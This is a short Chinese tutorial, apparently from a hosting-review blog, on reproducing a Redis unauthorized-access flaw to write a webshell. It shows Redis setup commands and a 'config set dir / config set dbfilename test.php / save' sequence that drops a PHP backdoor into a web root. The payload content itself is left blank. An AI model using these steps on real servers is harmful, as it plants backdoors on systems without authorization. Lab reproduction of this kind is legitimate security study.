数据库服务类--Redis--未授权访问&终端Getshell

04-23 1352阅读

免责声明:本文仅做技术交流与学习.

目录

前提条件:

windows上开启redis服务:

Linux上创建&开启redis服务:

操作:

1-连接靶机redis

2-写入webshell

3-访问后门

redis--->webshell

Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)

前提条件:

端口开放(6379)

目录结构清晰

windows上开启redis服务:

windows:
redis-server.exe redis.windows.conf
redis-cli.exe -h 127.0.0.1 -p 6379

Linux上创建&开启redis服务:

 

1、下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
​
2、解压编译
tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译
​
3、配置及启动
cd src/ #进入src目录 
cp redis-server /usr/bin/ 
cp redis-cli /usr/bin/      #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd ..   # 返回上一级目录
cp redis.conf /etc/     #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf  # 使用/etc/目录下的redis.conf文件中的配置启动redis服务
 

操作:
 

1-连接靶机redis
 

数据库服务类--Redis--未授权访问&终端Getshell
 

2-写入webshell
 

config set dir /www/wwwroot/IP
config  set dbfilename test.php
set test ""
bgsave
save
 

数据库服务类--Redis--未授权访问&终端Getshell 
 
 
 
目录,文件名自己改
 
 
写入内容自己改...
 
 

3-访问后门路径
 

--上线...
 

VPS购买请点击我
		

		
		

		文章版权声明:除非注明,否则均为主机测评原创文章,转载或复制请以超链接形式并注明出处。
			

	




	
相关阅读

	


				

		
	





	
目录[+]